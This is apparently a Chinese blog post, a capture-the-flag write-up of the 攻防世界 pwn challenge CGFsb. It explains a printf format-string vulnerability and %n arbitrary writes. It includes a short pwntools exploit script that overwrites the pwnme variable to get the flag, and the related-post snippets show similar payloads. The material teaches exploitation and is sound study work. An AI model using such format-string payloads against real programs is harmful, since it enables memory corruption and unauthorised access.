攻防世界pwn—CGFsb

最新推荐文章于 2023-07-23 15:39:58 发布
最新推荐文章于 2023-07-23 15:39:58 发布
阅读量291 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzw1134864657/article/details/97517065
版权

先看一下文件是32位的,再查看一下程序的保护机制
发现栈的保护开启,程序会在栈里放入一个canary,返回时检测canary是否发生变化
在这里插入图片描述
我们先运行一下程序看一下逻辑
在这里插入图片描述
在IDA中打开查看伪代码,发现如果pwnme=8,就可以到得到flag
此处要利用格式化字符串漏洞,使用%n格式修改任意地址内容,把前面已经打印的长度写入某个内存地址中去。
在这里插入图片描述

在这里设置断点
在这里插入图片描述
查看一下pwnme的地址
在这里插入图片描述

在write up里看到的几个格式化字符串漏洞的知识点

%n 将当前已打印字符的个数(4个字节)
%<正整数n> &lt; f m t &gt; 指 定 占 位 符 对 应 第 n 个 参 数 , 例 如 : &lt; fmt&gt;指定占位符对应第n个参数,例如:%12 <fmt>nx,此处%x对应第12个参数。
通过 ida 查看汇编代码 找到call printf的地址(调用printf(&s))。之后我们用gdb进行调试,在调用printf(&s)之前下一个断点,查看接收 message 的变量 s 是格式化字符串的第几个参数。输入 message 的时候输入 ‘aaaa’。

在网上找的脚本

from pwn import *
sh = remote('111.198.29.45',48794)
sh.recv()
sh.sendline('hacker')
sh.recv()
payload = p32(0x804a068) +'aaaa' +'%10$n'
sh.sendline(payload)
sh.interactive()

//remote函数是连接到远程服务器进行漏洞利用,recvuntil函数顾名思义就是等待服务器返回参数中的字符串后再执行后续操作,sendline就是向服务器发送一行数据,也就是我们的payload,最后打印出返回来的结果。

石桥下
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1578
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc
攻防世界-CGfsb详细知识点及解答
m0_74047686的博客
03-07 652
做这道题的时候,对于格式化字符串的知识要有一定了解,不然的话,就要像我一样,忙来忙去,很麻烦的如何利用格式化字符串呢?我做了一些知识总结。格式化字符串攻击(Format String Vulnerabilities,简称FSV)是指攻击者通过构造恶意格式化字符串控制符,在程序中读写不该被访问的内存区域、获取敏感信息等操作。攻击者通常利用以下方式来实施格式化字符串攻击:(1)打印栈上的数据。
攻防世界-CGfsb
yuqie的博客
06-30 260
看看附件,先在本地环境打一下,先放入kali查看一下版本: 再查看一下保护机制: 可以看出该程序是32位的,保护机制的解释如下:【1】RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表。【2】Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过。【3】NX:NX enabled
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1646
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3337
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
攻防世界pwn题:forgot.doc
07-13
攻防世界pwn题:forgot.doc
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
攻防世界详解CGfsb,格式化字符串漏洞,欢迎讨论
XDiku的博客
01-11 253
格式化字符串漏洞
[攻防世界]CGfsb
逆向萌新的博客
06-20 201
[攻防世界]CGfsb详解
PWN做题笔记7-CGfsb(这篇不要看了,写的时候没理解,理论分析部分有错误,但不想改)
qq_40923256的博客
04-21 247
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050&page=1 本题属于格式化字符串漏洞,主要利用gdb调试 文件中只有一个main方法,如图位置存在格式化字符串漏洞 这里需要提及一下格式化字符串漏洞的原理: 核心在于printf(&test)会将test解释为格式化字符串,并且,格式化字符串存在%n可以写入元素存储的地址中前面字符串长(注意地址%n
攻防世界 pwn cgfsb writeup
PLpa的博客
07-06 1854
攻防世界pwn——cgfsb 这一题是关于格式化字符串漏洞的题,是一个单一漏洞题,不需要太多的绕过。 拿到题目首先查看一下保护: 可以看到,这是一个32位的程序。 并且开启了Canary保护和NX保护。 我们看一下IDA: 进入IDA,按下F5可以得到伪C代码: 可以看到有一个格式化漏洞printf(&s),我们可以通过这条语句把pwnme的值改为8,就可以的到flag了。 打开gdb...
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1559
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
攻防世界pwn新手练习(CGfsb
BurYiA的博客
09-15 1527
CGfsb ok,按照惯例,拿到程序后先扔到Linux下查一下基本信息 32位程序,开了NX(堆栈不可执行)以及CANNARY(栈保护) 貌似有一丝丝头疼嗷,咱们运行一下,看看它的程序逻辑 唔,是一个留言板,可以输入的地方有两处,一处是名字,一处是留言内容。ok,可以扔进IDA分析了。 F5后直接看程序伪代码 很明显,我们需要让pwnme这个变量的值等于8,然后便可以拿到flag文件中的东西,...
[PWN](攻防世界)CGfsb
ljh15937的博客
09-15 215
分析程序漏洞 32位的程序,有 Canary 防护措施,栈不可执行技术 由于没有开启PIE,可以通过格式化字符串漏洞直接修改存在于 .bss 段的 pwnme 变量的值为 8,从而劫持程序执行流,执行system("cat flag);语句,获取 flag 利用程序 from pwn import * context(arch = 'amd64') context(log_level = 'DEBUG') context(terminal = ['deepin-terminal', '-x', '
CGfsb pwn
qq_62539372的博客
04-08 308
格式化字符串漏洞 标志 printf(&s) 查看一下保护 运行一下 第十个参数是我们传的 分析程序可得pwnme==8的时候 cat flag 利用fgets函数 改掉pwnme的值 改为8 脚本 from pwn import * #r=process("./CGfsb") r=remote('111.200.241.244',53697) pwnme_addr=0x0804A068 payload=p32(pwnme_addr)+b'%4c%10$n' r.sendlineaf.
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解
qq_35066257的博客
09-25 803
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解 在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞的利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/ 这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,写入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子 ...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值